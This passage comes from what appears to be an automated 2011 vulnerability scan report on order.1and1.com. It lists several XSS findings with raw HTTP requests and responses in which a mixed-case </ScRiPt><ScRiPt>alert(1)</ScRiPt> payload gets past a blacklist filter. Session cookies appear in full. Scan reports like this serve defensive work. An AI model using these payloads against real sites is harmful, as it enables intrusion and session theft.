Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:38:33 GMT; Path=/
ETag: c7593eca9d95d112a774e3b42a8bf63f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24356


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="DomaininfoMove";UNOUNO.params.lastpage="DomaininfoMoved1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:48:28 GMT; Path=/
ETag: 425493d0f8ed0f19e7a04c07ddd3cc38
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Eshops";UNOUNO.params.lastpage="Eshopsf145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:00 GMT; Path=/
ETag: 53f791f92af4dbedadc8055ee2452240
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17973


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureDatabaseDatabase";UNOUNO.params.lastpage="FeatureDatabaseDatabase9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=obmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:55:37 GMT; Path=/
ETag: 242b6a1e5eeabc95b2abaab00ee5cf77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19175


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailEmail";UNOUNO.params.lastpage="FeatureEmailEmailf6a45</ScRiPt >ca9d9974f55";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:56:00 GMT; Path=/
ETag: 3a27e5470d1c0301a5f75b92d0fc9df4
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16817


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailWebmail";UNOUNO.params.lastpage="FeatureEmailWebmail45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
